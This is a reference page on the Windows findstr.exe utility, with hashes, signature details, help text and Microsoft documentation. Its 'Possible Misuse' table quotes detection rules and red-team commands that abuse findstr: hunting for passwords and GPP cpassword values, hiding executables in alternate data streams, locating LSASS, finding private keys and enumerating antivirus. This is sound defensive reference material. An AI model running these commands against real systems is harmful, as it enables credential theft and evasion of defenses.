findstr.exe

• File Path: C:\WINDOWS\SysWOW64\findstr.exe
• Description: Find String (QGREP) Utility

Hashes

Type	Hash
MD5	EC8F4F520F20C292159D067979649502
SHA1	D00389FE8F9C6F8FFBE330451A35635D614B720D
SHA256	4332173C1585B767864DB04A042BA6F2A228E8CC7B040821344903EAFF6817C3
SHA384	C04399EBCD8492B601E1CE03499FCBFABF758F0917741662B965A1A2700ABE52B61E7A2D32B69C9A7E07F33A3B272E92
SHA512	CDB1A79D3A5AE541A13C9ADBBD49B70B3D5240C889208A9D735BBDDC9732E59B695FA6D0F815E5DE98C88391ADB767A49CB0F1692CB76A51ACD7C6E1B7AF15EF
SSDEEP	384:V9fpHwRHBKsVB7XRT96dJkYnB0Z3LgxmimiF33GHbOpKIfifPGhShPOAXu00xfWa:V8RHEsbZCkO0YRVB1Mhhlu0GZ4Kr
IMP	AD72E3C04C1BC40AB74532464B40A96E
PESHA1	4D6CDD3BB7453D114251101858F62D2F507B6798
PE256	37F5BB252004B457B409EBAB6B71C60F54C3B9DA42354316A454745EF13A2831

Runtime Data

Usage (stdout):

Searches for strings in files.

FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file]
        [/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]]
        strings [[drive:][path]filename[ ...]]

  /B         Matches pattern if at the beginning of a line.
  /E         Matches pattern if at the end of a line.
  /L         Uses search strings literally.
  /R         Uses search strings as regular expressions.
  /S         Searches for matching files in the current directory and all
             subdirectories.
  /I         Specifies that the search is not to be case-sensitive.
  /X         Prints lines that match exactly.
  /V         Prints only lines that do not contain a match.
  /N         Prints the line number before each line that matches.
  /M         Prints only the filename if a file contains a match.
  /O         Prints character offset before each matching line.
  /P         Skip files with non-printable characters.
  /OFF[LINE] Do not skip files with offline attribute set.
  /A:attr    Specifies color attribute with two hex digits. See "color /?"
  /F:file    Reads file list from the specified file(/ stands for console).
  /C:string  Uses specified string as a literal search string.
  /G:file    Gets search strings from the specified file(/ stands for console).
  /D:dir     Search a semicolon delimited list of directories
  strings    Text to be searched for.
  [drive:][path]filename
             Specifies a file or files to search.

Use spaces to separate multiple search strings unless the argument is prefixed
with /C.  For example, 'FINDSTR "hello there" x.y' searches for "hello" or
"there" in file x.y.  'FINDSTR /C:"hello there" x.y' searches for
"hello there" in file x.y.

Regular expression quick reference:
  .        Wildcard: any character
  *        Repeat: zero or more occurrences of previous character or class
  ^        Line position: beginning of line
  $        Line position: end of line
  [class]  Character class: any one character in set
  [^class] Inverse class: any one character not in set
  [x-y]    Range: any characters within the specified range
  \x       Escape: literal use of metacharacter x
  \<xyz    Word position: beginning of word
  xyz\>    Word position: end of word

For full information on FINDSTR regular expressions refer to the online Command
Reference.

Usage (stderr):

FINDSTR: /- ignored
FINDSTR: /h ignored
FINDSTR: Bad command line

Child Processes:

conhost.exe

Open Handles:

Path	Type
(R-D) C:\Windows\System32\en-US\findstr.exe.mui	File
(RW-) C:\Windows	File
(RW-) C:\Windows\SysWOW64	File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db	Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db	Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro	Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0	Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0	Section

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\findstr.exe

Signature

• Status: Signature verified.
• Serial: 33000002ED2C45E4C145CF48440000000002ED
• Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
• Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
• Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

• Original Filename: FINDSTR.EXE
• Product Name: Microsoft Windows Operating System
• Company Name: Microsoft Corporation
• File Version: 10.0.22000.1 (WinBuild.160101.0800)
• Product Version: 10.0.22000.1
• Language: English (United States)
• Legal Copyright: Microsoft Corporation. All rights reserved.
• Machine Type: 32-bit

File Scan

• VirusTotal Detections: 0/73
• VirusTotal Link: https://www.virustotal.com/gui/file/4332173c1585b767864db04a042ba6f2a228e8cc7b040821344903eaff6817c3/detection

Possible Misuse

The following table contains possible examples of findstr.exe being misused. While findstr.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	sysmon_suspicious_remote_thread.yml	- '\findstr.exe'	DRL 1.0
sigma	proc_creation_win_automated_collection.yml	OriginalFileName: FINDSTR.EXE	DRL 1.0
sigma	proc_creation_win_discover_private_keys.yml	- 'findstr '	DRL 1.0
sigma	proc_creation_win_findstr_gpp_passwords.yml	title: Findstr GPP Passwords	DRL 1.0
sigma	proc_creation_win_findstr_gpp_passwords.yml	- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr	DRL 1.0
sigma	proc_creation_win_findstr_gpp_passwords.yml	Image\|endswith: \findstr.exe	DRL 1.0
sigma	proc_creation_win_susp_findstr.yml	title: Abusing Findstr for Defense Evasion	DRL 1.0
sigma	proc_creation_win_susp_findstr.yml	description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism	DRL 1.0
sigma	proc_creation_win_susp_findstr.yml	- https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Findstr.yml	DRL 1.0
sigma	proc_creation_win_susp_findstr.yml	- findstr	DRL 1.0
sigma	proc_creation_win_susp_findstr.yml	- Administrative findstr usage	DRL 1.0
sigma	proc_creation_win_susp_findstr_385201.yml	title: Suspicious Findstr 385201 Execution	DRL 1.0
sigma	proc_creation_win_susp_findstr_385201.yml	Image\|endswith: \findstr.exe	DRL 1.0
sigma	proc_creation_win_susp_findstr_lnk.yml	title: Findstr Launching .lnk File	DRL 1.0
sigma	proc_creation_win_susp_findstr_lnk.yml	description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack	DRL 1.0
sigma	proc_creation_win_susp_findstr_lnk.yml	Image\|endswith: '\findstr.exe'	DRL 1.0
sigma	proc_creation_win_susp_spoolsv_child_processes.yml	- \findstr.exe	DRL 1.0
LOLBAS	Findstr.yml	Name: Findstr.exe
LOLBAS	Findstr.yml	- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
LOLBAS	Findstr.yml	- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
LOLBAS	Findstr.yml	- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
LOLBAS	Findstr.yml	- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
LOLBAS	Findstr.yml	- Path: C:\Windows\System32\findstr.exe
LOLBAS	Findstr.yml	- Path: C:\Windows\SysWOW64\findstr.exe
atomic-red-team	index.md	- Atomic Test #3: Extracting passwords with findstr [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: GPP Passwords (findstr) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #3: Extracting passwords with findstr [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: GPP Passwords (findstr) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	T1003.001.md	$LSASS = tasklist | findstr “lsass”	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT	MIT License. © 2018 Red Canary
atomic-red-team	T1012.md	reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri “.*.sys$”	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	$localip = ((ipconfig | findstr [0-9]..)[0]).Split()[-1]	MIT License. © 2018 Red Canary
atomic-red-team	T1033.md	for /F “tokens=1,2” %i in (‘qwinsta /server:#{computer_name} ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > computers.txt	MIT License. © 2018 Red Canary
atomic-red-team	T1033.md	@FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt	MIT License. © 2018 Red Canary
atomic-red-team	T1119.md	dir c: /b /s .docx | findstr /e .docx	MIT License. © 2018 Red Canary
atomic-red-team	T1490.md	if(!(vssadmin.exe list shadows | findstr “No items found that satisfy the query.”)) { exit 0 } else { exit 1 }	MIT License. © 2018 Red Canary
atomic-red-team	T1518.001.md	tasklist.exe | findstr /i virus	MIT License. © 2018 Red Canary
atomic-red-team	T1518.001.md	tasklist.exe | findstr /i cb	MIT License. © 2018 Red Canary
atomic-red-team	T1518.001.md	tasklist.exe | findstr /i defender	MIT License. © 2018 Red Canary
atomic-red-team	T1518.001.md	tasklist.exe | findstr /i cylance	MIT License. © 2018 Red Canary
atomic-red-team	T1518.001.md	fltmc.exe | findstr.exe 385201	MIT License. © 2018 Red Canary
atomic-red-team	T1552.001.md	- Atomic Test #3 - Extracting passwords with findstr	MIT License. © 2018 Red Canary
atomic-red-team	T1552.001.md	## Atomic Test #3 - Extracting passwords with findstr	MIT License. © 2018 Red Canary
atomic-red-team	T1552.001.md	findstr /si pass *.xml *.doc *.txt *.xls	MIT License. © 2018 Red Canary
atomic-red-team	T1552.004.md	dir c:\ /b /s .key | findstr /e .key	MIT License. © 2018 Red Canary
atomic-red-team	T1552.006.md	- Atomic Test #1 - GPP Passwords (findstr)	MIT License. © 2018 Red Canary
atomic-red-team	T1552.006.md	## Atomic Test #1 - GPP Passwords (findstr)	MIT License. © 2018 Red Canary
atomic-red-team	T1552.006.md	findstr /S cpassword %logonserver%\sysvol*.xml	MIT License. © 2018 Red Canary
atomic-red-team	T1562.001.md	if ((cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }	MIT License. © 2018 Red Canary
atomic-red-team	T1562.001.md	if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }	MIT License. © 2018 Red Canary
atomic-red-team	T1562.001.md	if(cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) { C:\Windows\Sysmon.exe -accepteula -i } else	MIT License. © 2018 Red Canary
atomic-red-team	T1562.001.md	if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }	MIT License. © 2018 Red Canary
atomic-red-team	T1564.004.md	findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe	MIT License. © 2018 Red Canary
signature-base	apt_eqgrp_apr17.yar	$x1 = “@@for /f "delims=" %%i in (‘findstr /smc:"%s" *.msg’) do if not "%%MsgFile1%%"=="%%i" del /f "%%i"” fullword ascii	CC BY-NC 4.0
signature-base	apt_lazarus_dec17.yar	$x8 = “whoami /groups | findstr /c:"S-1-5-32-544"” fullword ascii	CC BY-NC 4.0
signature-base	gen_susp_lnk_files.yar	$command = “C:\Windows\System32\cmd.exe” fullword ascii //cmd is precursor to findstr	CC BY-NC 4.0
signature-base	gen_susp_lnk_files.yar	$command2 = {2F 00 63 00 20 00 66 00 69 00 6E 00 64 00 73 00 74 00 72} //findstr in hex	CC BY-NC 4.0
stockpile	de632c2d-a729-4b77-b781-6a6b09c148ba.yml	for %i in (\.key \.pgp \.gpg \.ppk \.p12 \.pem \.pfx \.cer \.p7b \.asc) do (dir c:\ /b /s .key \| findstr /e "%i")	Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

---

findstr

Searches for patterns of text in files.

Syntax

findstr [/b] [/e] [/l | /r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/f:<file>] [/c:<string>] [/g:<file>] [/d:<dirlist>] [/a:<colorattribute>] [/off[line]] <strings> [<drive>:][<path>]<filename>[ ...]

Parameters

Parameter	Description
/b	Matches the text pattern if it is at the beginning of a line.
/e	Matches the text pattern if it is at the end of a line.
/l	Processes search strings literally.
/r	Processes search strings as regular expressions. This is the default setting.
/s	Searches the current directory and all subdirectories.
/i	Ignores the case of the characters when searching for the string.
/x	Prints lines that match exactly.
/v	Prints only lines that don’t contain a match.
/n	Prints the line number of each line that matches.
/m	Prints only the file name if a file contains a match.
/o	Prints character offset before each matching line.
/p	Skips files with non-printable characters.
/off[line]	Does not skip files that have the offline attribute set.
/f:<file>	Gets a file list from the specified file.
/c:<string>	Uses the specified text as a literal search string.
/g:<file>	Gets search strings from the specified file.
/d:<dirlist>	Searches the specified list of directories. Each directory must be separated with a semicolon (;), for example dir1;dir2;dir3.
/a:<colorattribute>	Specifies color attributes with two hexadecimal digits. Type color /? for additional information.
<strings>	Specifies the text to search for in filename. Required.
[\<drive>:][<path>]<filename>[...]	Specifies the location and file or files to search. At least one file name is required.
/?	Displays Help at the command prompt.

Remarks

• All findstr command-line options must precede strings and filename in the command string.

• Regular expressions use both literal characters and meta-characters to find patterns of text, rather than exact strings of characters.

  • A literal character is a character that doesn’t have a special meaning in the regular-expression syntax; instead, it matches an occurrence of that character. For example, letters and numbers are literal characters.

  • A meta-character is a symbol with special meaning (an operator or delimiter) in the regular-expression syntax.

    The accepted meta-characters are:

    Meta-character	Value
    .	Wildcard - Any character
    *	Repeat - Zero or more occurrences of the previous character or class.
    ^	Beginning line position - Beginning of the line.
    $	Ending line position - End of the line.
    [class]	Character class - Any one character in a set.
    [^class]	Inverse class - Any one character not in a set.
    [x-y]	Range - Any characters within the specified range.
    \x	Escape - Literal use of a meta-character.
    \<string	Beginning word position - Beginning of the word.
    string\>	Ending word position - End of the word.

    The special characters in regular expression syntax have the most power when you use them together. For example, use the combination of the wildcard character (.) and repeat (*) character to match any string of characters: .*

    Use the following expression as part of a larger expression to match any string beginning with b and ending with ing: b.*ing

• To search for multiple strings in a set of files, you must create a text file that contains each search criterion on a separate line.

• Use spaces to separate multiple search strings unless the argument is prefixed with /c.

Examples

To search for hello or there in file x.y, type:

findstr hello there x.y

To search for hello there in file x.y, type:

findstr /c:"hello there" x.y

To find all occurrences of the word Windows (with an initial capital letter W) in the file proposal.txt, type:

findstr Windows proposal.txt

To search every file in the current directory and all subdirectories that contained the word Windows, regardless of the letter case, type:

findstr /s /i Windows *.*

To find all occurrences of lines that begin with FOR and are preceded by zero or more spaces (as in a computer program loop), and to display the line number where each occurrence is found, type:

findstr /b /n /r /c:^ *FOR *.bas

To list the exact files that you want to search in a text file, use the search criteria in the file stringlist.txt, to search the files listed in filelist.txt, and then to store the results in the file results.out, type:

findstr /g:stringlist.txt /f:filelist.txt > results.out

To list every file containing the word computer within the current directory and all subdirectories, regardless of case, type:

findstr /s /i /m \<computer\> *.*

To list every file containing the word computer and any other words that begin with comp, (such as compliment and compete), type:

findstr /s /i /m \<comp.* *.*

Additional References

• Command-Line Syntax Key

---

MIT License. Copyright (c) 2020-2021 Strontic.